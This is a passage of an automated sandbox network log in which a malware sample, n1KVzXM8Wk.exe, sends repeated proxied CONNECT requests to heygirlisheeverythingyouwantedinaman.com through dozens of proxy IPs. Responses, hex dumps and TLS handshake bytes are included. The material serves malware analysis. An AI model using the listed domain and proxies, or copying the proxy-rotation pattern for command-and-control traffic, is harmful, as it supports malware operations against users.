                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      866192.168.2.452058177.38.10.1580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.592694998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680497885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.176719904 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      867192.168.2.452565115.144.163.192271816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.599354982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.475013018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865850925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.282468081 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      868192.168.2.45260460.12.168.11490026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.616987944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.043313026 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 09:23:42 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      869192.168.2.452735152.32.132.2204436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.664341927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      870192.168.2.452738152.32.132.2204436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.666177988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      871192.168.2.452740152.32.132.2204436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.666908026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      872192.168.2.452549117.160.250.16380806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.672652960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.183970928 CET221INHTTP/1.1 403 Access Denied
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Type: text/html
                                                                                                      Content-Language: en
                                                                                                      Content-Length: 43
                                                                                                      Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                      Data Ascii: You are not allowed to access the document.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      873192.168.2.452743152.32.132.2204436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.673156023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      874192.168.2.45265452.172.1.18631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.680336952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.541574955 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      875192.168.2.45267744.190.9.65481006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.680721045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      876192.168.2.452657211.222.252.18781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.680757046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      877192.168.2.45265893.90.212.241536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.681935072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      878192.168.2.452011219.243.212.11884436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.689409018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.046942949 CET22INHTTP/1.1 502 ERROR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      879192.168.2.452698104.25.42.178806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.693396091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.780857086 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      880192.168.2.449809104.248.151.220510406812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.693613052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.865581989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      881192.168.2.4520718.142.127.15831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.693909883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.716550112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.716756105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.937140942 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      882192.168.2.45266837.235.48.19806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.701138020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      883192.168.2.452645125.94.219.9690916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.705530882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.053061962 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:23 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      884192.168.2.452709172.67.242.194806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.707349062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.798842907 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      885192.168.2.452030123.30.154.3820086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.710088015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.865576029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.241749048 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      886192.168.2.45266378.186.18.14236296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.725169897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      887192.168.2.452655175.183.82.221806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.727557898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      888192.168.2.452650103.138.14.123806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.729193926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.537585020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740751982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.602735043 CET19INHTTP/1.1 200 OK
                                                                                                      Feb 23, 2024 09:45:25.626121044 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 5b 25 5b 60 c5 95 fc 96 46 30 e6 5f a1 f8 11 c8 1c 7c 95 31 af 17 a8 e1 e0 f0 26 85 ec 8d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[%[`F0_|1&*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#1jAE-Gu:w\mop9pKc_
                                                                                                      Feb 23, 2024 09:45:26.010554075 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 5b 25 d4 d6 9c b2 3b c1 83 8d 33 0d 9c 6c a0 9b 7f 1b 3f d7 cb 29 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                                      Data Ascii: C?e[%;3l?)DOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                                      Feb 23, 2024 09:45:26.010562897 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                                      Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                                      Feb 23, 2024 09:45:26.010576010 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                                      Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                                      Feb 23, 2024 09:45:26.010581017 CET238INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                                      Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y
                                                                                                      Feb 23, 2024 09:45:26.365371943 CET594INData Raw: 02 05 03 03 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 34 a4 1e b1 28 a3 d0 b4 76 17 a6 31 7a 21 e9 d1 52 3e c8 db 74 16 41 88 b8 3d 35 1d ed e4 ff 93 e1 5c 5f ab bb ea 7c cf db e4 0d d1 8b 57 f2 26 6f 5b be 17 46 68 94 37 6f 6b
                                                                                                      Data Ascii: 0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[w
                                                                                                      Feb 23, 2024 09:45:26.395236015 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 63 e2 8b 08 d4 2a 4b 9e 2b ca e4 74 40 fc 9d a8 b3 bb 6e 73 51 d0 33 6f 1a d9 4f b2 ec 84 dd 72 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 68 97 f9 a6 09 bf 3d 68 5a 94 eb 6b 65 8f f6 94 03 7f 3d b0 11
                                                                                                      Data Ascii: %! c*K+t@nsQ3oOr(h=hZke=WNM
                                                                                                      Feb 23, 2024 09:45:26.778728008 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 3b ec ea 22 b9 7a a8 ed aa b5 49 1a 40 dd fc 8d 3b ba ae 12 86 2c ae bd 52 0c 63 c6 b1 05 7c 62 70 38 25 12 82 0f 33 22 79 03 d1 d3 64 59 1a 5e 3a 3a b0 3d 49 db 20 58 de f0 54 f0 51 2b 3b 16 a9 be dd
                                                                                                      Data Ascii: ;"zI@;,Rc|bp8%3"ydY^::=I XTQ+;JONt<j$=ix6>T]1@7S1^Zno4|u@Pxf9d]B!O~}+$(SaE7'3W\
                                                                                                      Feb 23, 2024 09:45:26.784810066 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 9e cc 71 a3 bb b8 42 3d b5 8d c4 46 9f e9 f8 ee 66 78 90 7b 36 ca dc 0d ac 2c b4 a0 97 be 05 08 6e 4d c6 59 eb 22 75 35 c2 4d 0a e8 2f 19 96 33 a3 fa 3f 1f 5d 10 32 81 45 c8 0f d7 20 56 30 d2 f6 89 e8 be 2f
                                                                                                      Data Ascii: qB=Ffx{6,nMY"u5M/3?]2E V0/#a;Z0*Qq~`Fu+jW]0knZ
                                                                                                      Feb 23, 2024 09:45:27.548418999 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 21 19 c7 f5 07 a6 5e 57 1e cd 9c 94 d4 1d 3f 3d 3e 6f 11 db 07 67 da 57 ae 2d 2b f6 7f ff 85 bd 2f ec f9 17 43 14 c0 61 ac 12 60 93 66 e0 85 b4 c2 a7 63 77 4b 55 5c ec 97 3e 61 01 ae 04 fd c8 0d 7a f8 9a b0
                                                                                                      Data Ascii: q!^W?=>ogW-+/Ca`fcwKU\>azd,^}_'BRG)I}?2)Q+{[r=^:"4idn7!}EG:epNHZQq7afVp+y 5T(9*RQ%[qicK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      889192.168.2.45267331.170.22.12710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.740317106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      890192.168.2.452419184.170.245.14841456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.761940002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      891192.168.2.45223372.210.221.19741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.776145935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      892192.168.2.452003194.233.78.142411196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.776161909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.865731001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.866492033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.866466999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.881212950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.881160021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:10.959379911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      893192.168.2.452749104.21.102.95806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.787270069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.875041008 CET316INHTTP/1.1 400 Bad Request
